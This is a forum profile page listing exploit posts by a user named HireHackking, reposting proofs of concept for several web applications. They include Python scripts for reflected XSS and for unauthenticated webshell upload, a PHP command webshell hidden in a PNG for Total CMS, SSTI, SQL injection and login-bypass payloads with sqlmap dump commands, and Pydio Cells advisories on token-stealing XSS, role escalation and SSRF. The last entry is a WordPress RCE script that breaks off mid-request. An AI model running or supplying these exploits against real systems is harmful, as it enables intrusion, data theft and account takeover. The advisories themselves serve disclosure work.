Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Online Security Guards Hiring System 1.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA #Date: 23-01-2023 #Exploit Author : AFFAN AHMED #Vendor Homepage: https://phpgurukul.com #Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip #Version: 1.0 #Tested on: Windows 11 + XAMPP + PYTHON-3.X #CVE : CVE-2023-0527 #NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT # Below code check for both the parameter /admin-profile.php and in /search.php #POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md import requests import re from colorama import Fore print(Fore.YELLOW + "######################################################################" + Fore.RESET) print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET) print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET) print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET) print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET) print(Fore.YELLOW +"######################################################################" + Fore.RESET) print() print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET) print() # NAVIGATING TO ADMIN LOGIN PAGE Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET) print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET) Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''} headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Referer': 'http://localhost/osghs/admin/login.php', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Connection': 'close', 'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document' } response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials) if response.status_code == 200: location = re.findall(r'document.location =\'(.*?)\'',response.text) if location: print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET) print(Fore.GREEN + "> Popup:"+ Fore.RESET,location ) else: print(Fore.GREEN + "> document.location not found"+ Fore.RESET) else: print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET) print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET) # NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE # FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD # FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search="" payload = { "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE "username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE "mobilenumber": "8979555558", "email": "admin@gmail.com", "submit": "", } # SENDING THE RESPONSE WITH POST REQUEST response = requests.post(Website_url, headers=headers, data=payload) print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) # CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200: scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text) print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET) print(Fore.GREEN+">"+Fore.RESET,scripts)
  2. HireHackking

    Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004 Advisory Status: published CVE: CVE-2023-32751 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ When a file named "xss.html" is downloaded in the Pydio Cells web application, a download URL similar to the following is generated: https://example.com/io/xss/xss.html ?AWSAccessKeyId=gateway &Expires=1682495748 &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D &response-content-disposition=attachment%3B%20filename%3Dxss.html &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] The URL is akin to a presigned URL as used by the Amazon S3 service. It contains the URL parameter "response-content-disposition" which is set to "attachment" causing the response to contain a "Content-Disposition" header with that value. Therefore, the browser downloads the file instead of interpreting it. The URL also contains a signature and expiry timestamp, which are checked by the backend. Unlike a presigned URL as used by S3, the URL also contains the parameter "pydio_jwt" with the JWT of the user for authentication. Furthermore, the access key with the ID "gateway" is referenced, which can be found in the JavaScript sources of Pydio Cells together with the secret: ------------------------------------------------------------------------ _awsSdk.default.config.update({ accessKeyId: 'gateway', secretAccessKey: 'gatewaysecret', s3ForcePathStyle: !0, httpOptions: { timeout: PydioApi.getMultipartUploadTimeout() } }); ------------------------------------------------------------------------ With this information it is possible to change the URL parameter "response-content-disposition" to the value "inline" and then calculate a valid signature for the resulting URL. Furthermore, the content type of the response can be changed to "text/html" by also adding the URL parameter "response-content-type" with that value. This would result in a URL like the following for the previously shown example URL: https://example.com/io/xss/xss.html? AWSAccessKeyId=gateway &Expires=1682495668 &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D &response-content-disposition=inline &response-content-type=text%2Fhtml &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] Upon opening the URL in a browser, the HTML included in the file is interpreted and any JavaScript code is run. Proof of Concept ================ Upload a HTML file into an arbitrary location of a Pydio Cells instance. For example with the following contents: ------------------------------------------------------------------------ <html> <body> <h1>Cross-Site Scriping</h1> <script> let token = JSON.parse(localStorage.token4).AccessToken; alert(token); </script> </body> </html> ------------------------------------------------------------------------ The contained JavaScript code reads the JWT access token for Pydio Cells from the browser's local storage object and opens a message box. Instead of just displaying the JWT, it could also be sent to an attacker. The following JavaScript function can then be run within the browser's developer console to generate a presigned URL for the HTML file: ------------------------------------------------------------------------ async function getPresignedURL(path) { let client = PydioApi.getClient(); let node = new AjxpNode(path); let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"}; let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata); return url; } await getPresignedURL("xss/xss.html"); ------------------------------------------------------------------------ The code has to be run in context of Pydio Cells while being logged in. If the resulting URL is opened in a browser, the JavaScript code contained in the HTML file is run. If the attack is conducted in the described way, the JWT of the attacker is exposed through the URL. However, this can be circumvented by first generating a public URL for the file and then constructing the presigned URL based on the resulting download URL. Workaround ========== No workaround known. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers that can upload files to a Pydio Cells instance can construct URLs that execute arbitrary JavaScript code in context of Pydio Cells upon opening. This could for example be used to steal the authentication tokens of users opening the URL. It is likely that such an attack succeeds, since sharing URLs to files hosted using Pydio Cells is a common use case of the application. Therefore, the vulnerability is estimated to pose a high risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://aws.amazon.com/sdk-for-javascript/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  3. HireHackking

    Pydio Cells 4.1.2 - Unauthorised Role Assignments

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Privilege Escalation Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003 Advisory Status: published CVE: CVE-2023-32749 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ Users can share cells or folders with other users on the same Pydio instance. The web application allows to either select an already existing user from a list or to create a new user by entering a new username and password, if this functionality is enabled. When creating a new user in this way, a HTTP PUT request like the following is sent: ------------------------------------------------------------------------ PUT /a/user/newuser HTTP/2 Host: example.com User-Agent: agent Authorization: Bearer O48gvjD[...] Content-Type: application/json Content-Length: 628 Cookie: token=AO[...] { "Attributes": { "profile": "shared", "parameter:core.conf:lang": "\"en-us\"", "send_email": "false" }, "Roles": [], "Login": "newuser", "Password": "secret!", "GroupPath": "/", "Policies": [...] } ------------------------------------------------------------------------ The JSON object sent in the body contains the username and password for the user to be created and an empty list for the key "Roles". The response contains a JSON object similar to the following: ------------------------------------------------------------------------ { "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "GroupPath": "/", "Attributes": { "parameter:core.conf:lang": "\"en-us\"", "profile": "shared" }, "Roles": [ { "Uuid": "EXTERNAL_USERS", "Label": "External Users", "Policies": [...] }, { "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "Label": "User newuser", "UserRole": true, "Policies": [...] } ], "Login": "newuser", "Policies": [....], "PoliciesContextEditable": true } ------------------------------------------------------------------------ The key "Roles" now contains a list with two objects, which seem to be applied by default. The roles list in the HTTP request can be modified to contain a list of all available UUIDs for roles, which can be obtained by using the user search functionality. This results in a new user account with all roles applied. By performing a login as the newly created user, access to all cells and non-personal workspaces of the whole Pydio instance is granted. Proof of Concept ================ Login to the Pydio Cells web interface with a regular user and retrieve the JWT from the HTTP requests. This can either be done using an HTTP attack proxy or using the browser's developer tools. Subsequently, curl [1] can be used as follows to retrieve a list of all users and their roles: ------------------------------------------------------------------------ $ export JWT="<insert JWT here>" $ curl --silent \ --header "Authorization: Bearer $TOKEN" \ --header 'Content-Type: application/json' \ --data '{}' \ https://example.com/a/user | tee all_users.json {"Users":[...]} ------------------------------------------------------------------------ Afterwards, jq [2] can be used to create a JSON document which can be sent to the Pydio REST-API in order to create the external user "foobar" with the password "hunter2" and all roles assigned: ------------------------------------------------------------------------ $ jq '.Users[].Roles' all_users.json \ | jq -s 'flatten | .[].Uuid | {Uuid: .}' \ | jq -s 'unique' \ | jq '{"Login": "foobar", "Password": "hunter2", "Attributes": {"profile": "shared"}, "Roles": .}' \ | tee create_user.json { "Login": "foobar", "Password": "hunter2", "Attributes": { "profile": "shared" }, "Roles": [...] } ------------------------------------------------------------------------ Finally, the following curl command can be issued to create the new external user: ------------------------------------------------------------------------ $ curl --request PUT \ --silent \ --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --data @create_user.json \ https://example.com/a/user/foobar ------------------------------------------------------------------------ Now, login with the newly created user to access all cells and non-personal workspaces. Workaround ========== Disallow the creation of external users in the authentication settings. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers with access to any regular user account for a Pydio Cells instance can extend their privileges by creating a new external user with all roles assigned. Subsequently, they can access all folders and files in any cell and workspace, except for personal workspaces. The creation of external users is activated by default. Therefore, the vulnerability is estimated to pose a high risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://curl.se/ [2] https://stedolan.github.io/jq/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/
  4. HireHackking

    Faculty Evaluation System 1.0 - Unauthenticated File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload # Date: 5/29/2023 # Author: Alex Gan # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip # Version: 1.0 # Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6 # CVE: CVE-2023-33440 # References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440 # https://www.exploit-db.com/exploits/49320 # https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system # #!/usr/bin/env python3 import os import sys import requests import argparse from bs4 import BeautifulSoup from urllib.parse import urlparse from requests.exceptions import ConnectionError, Timeout def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', type=str, help='URL') parser.add_argument('-p', '--payload', type=str, help='PHP webshell') return parser.parse_args() def get_user_input(args): if not (args.url): args.url = input('Use the -u argument or Enter URL:') if not (args.payload): args.payload = input('Use the -p argument or Enter file path PHP webshell: ') return args.url, args.payload def check_input_url(url): parsed_url = urlparse(url) if not parsed_url.scheme: url = 'http://' + url if parsed_url.path.endswith('/'): url = url.rstrip('/') return url def check_host_availability(url): try: response = requests.head(url=url + '/login.php') if response.status_code == 200: print("[+] Host is accessible") else: print("[-] Host is not accessible") print(" Status code:", response.status_code) sys.exit() except (ConnectionError, Timeout) as e: print("[-] Host is not accessible") sys.exit() except requests.exceptions.RequestException as e: print("[-] Error:", e) sys.exit() def make_request(url, method, files=None): if method == 'GET': response = requests.get(url) elif method == 'POST': response = requests.post(url, files=files) else: raise ValueError(f'Invalid HTTP method: {method}') if response.status_code == 200: print('[+] Request successful') return response.text else: print(f'[-] Error {response.status_code}: {response.text}') return None def find_file(response_get, filename, find_url): soup = BeautifulSoup(response_get, 'html.parser') links = soup.find_all('a') found_files = [] for link in links: file_upl = link.get('href') if file_upl.endswith(filename): found_files.append(file_upl) if found_files: print(' File found:') for file in found_files: print('[*] ' + file) print(' Full URL of your file:') for file_url in found_files: print('[*] ' + find_url + file_url) else: print('[-] File not found') def main(): args = get_args() url, payload = get_user_input(args) url = check_input_url(url) check_host_availability(url) post_url = url + "/ajax.php?action=save_user" get_url = url + "/assets/uploads/" filename = os.path.basename(payload) payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))] print(" Loading payload file") make_request(post_url, 'POST', files=payload_file) print(" Listing the uploads directory") response_get = make_request(get_url, 'GET') print(" Finding the downloaded payload file") find_file(response_get, filename, get_url) if __name__ == "__main__": main()
  5. HireHackking

    Total CMS 1.7.4 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) # Date: 02/06/2023 # Exploit Author: tmrswrr # Version: 1.7.4 # Vendor home page : https://www.totalcms.co/ 1) Go to this page and click edit page button https://www.totalcms.co/demo/soccer/ 2)After go down and will you see downloads area 3)Add in this area shell.php file ?PNG ... <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> IEND 4) After open this file and write commands https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id Result : ?PNG ... uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data) IEND
  6. HireHackking

    MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)

    HireHackking posted a blog entry in Hacker Technology
    # Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI) # Author: tmrswrr # Date: 31/05/2023 # Vendor: https://www.motocms.com # Link: https://www.motocms.com/website-templates/demo/189526.html # Vulnerable Version(s): MotoCMS 3.0.27 ## Description MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the keyword parameter. ## Steps to Reproduce 1. Open the target URL: https://template189526.motopreview.com/ 2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} 3. You will be see result is 49 Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1 Host: template189526.motopreview.com Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Dnt: 1 Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close
  7. HireHackking

    Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-06-03 # Exploit Author: tmrswrr # Vendor Homepage: https://barebonescms.com/ # Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip # Version: v2.0.2 # Tested : https://demo.barebonescms.com/ --- Description --- 1) Login admin panel and go to new story : https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540 2) Click edit button and write your payload in the title field: Payload: "><script>alert(1)</script> 3) After save change and will you see alert button POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1 Host: demo.barebonescms.com Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 237 Origin: https://demo.barebonescms.com Dnt: 1 Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=
  8. HireHackking

    Pydio Cells 4.1.2 - Server-Side Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Server-Side Request Forgery Security Risk: medium Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005 Advisory Status: published CVE: CVE-2023-32750 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ Using the REST-API of Pydio Cells it is possible to start jobs. For example, when renaming a file or folder an HTTP request similar to the following is sent: ------------------------------------------------------------------------ PUT /a/jobs/user/move HTTP/2 Host: example.com User-Agent: agent Accept: application/json Authorization: Bearer G4ZRN[...] Content-Type: application/json Content-Length: 140 { "JobName": "move", "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}" } ------------------------------------------------------------------------ The body contains a JSON object with a job name and additional parameters for the job. Besides the "move" job, also a job with the name "remote-download" exists. It takes two additional parameters: "urls" and "target". In the "urls" parameter, a list of URLs can be specified and in the parameter "target" a path can be specified in which to save the response. When the job is started, HTTP GET requests are sent from the Pydio Cells server to the specified URLs. The responses are saved into a file, which are uploaded to the specified folder within Pydio Cells. Potential errors are transmitted in a WebSocket channel, which can be opened through the "/ws/event" endpoint. Proof of Concept ================ Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, run the following commands to start a "remote-download" job to trigger an HTTP request: ------------------------------------------------------------------------ $ export JWT="<insert JWT here>" $ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \ | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \ | tee remote-download.json $ curl --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --request PUT \ --data @remote-download.json 'https://example.com/a/jobs/user/remote-download' ------------------------------------------------------------------------ The URL in the JSON document specifies which URL to request. The "target" field in the same document specifies into which folder the response is saved. Afterwards, the response is contained in a file in the specified folder. Potential errors are communicated through the WebSocket channel. Workaround ========== Limit the services which can be reached by the Pydio Cells server, for example using an outbound firewall. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= The risk is highly dependent on the environment in which the attacked Pydio Cells instance runs. If there are any internal HTTP services which expose sensitive data on the same machine or within the same network, the server-side request forgery vulnerability could pose a significant risk. In other circumstances, the risk could be negligible. Therefore, overall the vulnerability is rated as a medium risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/
  9. HireHackking

    Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI) # Date of found: 18/05/2023 # Exploit Author: VIVEK CHOUDHARY @sudovivek # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html # CVE: CVE-2023-33584 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584 Vulnerability Description - Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. Steps to Reproduce - The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0: 1. Launch the Enrollment System Project V1.0 application. 2. Open the login page by accessing the URL: http://localhost/enrollment/login.php. 3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}. 4. Click the login button to execute the SQL Injection payload. As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.
  10. HireHackking

    MotoCMS Version 3.4.3 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Title: MotoCMS Version 3.4.3 - SQL Injection # Author: tmrswrr # Date: 01/06/2023 # Vendor: https://www.motocms.com # Link: https://www.motocms.com/website-templates/demo/189526.html # Vulnerable Version(s): MotoCMS 3.4.3 ## Description MotoCMS Version 3.4.3 SQL Injection via the keyword parameter. ## Steps to Reproduce 1) By visiting the url: https://template189526.motopreview.com/store/category/search/?keyword=1 2) Run sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch and this command sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump ### Parameter & Payloads ### Parameter: keyword (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE
  11. HireHackking

    File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE) # Date: 05/31/2023 # Exploit Author: Mateus Machado Tesser # Vendor Homepage: https://advancedfilemanager.com/ # Version: File Manager Advanced Shortcode 2.3.2 # Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15 # CVE: CVE-2023-2068 import requests import json import pprint import sys import re PROCESS = "\033[1;34;40m[*]\033[0m" SUCCESS = "\033[1;32;40m[+]\033[0m" FAIL = "\033[1;31;40m[-]\033[0m" try: COMMAND = sys.argv[2] IP = sys.argv[1] if len(COMMAND) > 1: pass if IP: pass else: print(f'Use: {sys.argv[0]} IP COMMAND') except: pass url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel print(f"{PROCESS} Searching fmakey") try: r = requests.get(url) raw_fmakey = r.text fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1] if len(fmakey) == 0: print(f"{FAIL} Cannot found fmakey!") except: print(f"{FAIL} Cannot found fmakey!") print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!') url = "http://"+IP+"/wp-admin/admin-ajax.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"} data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n" data += 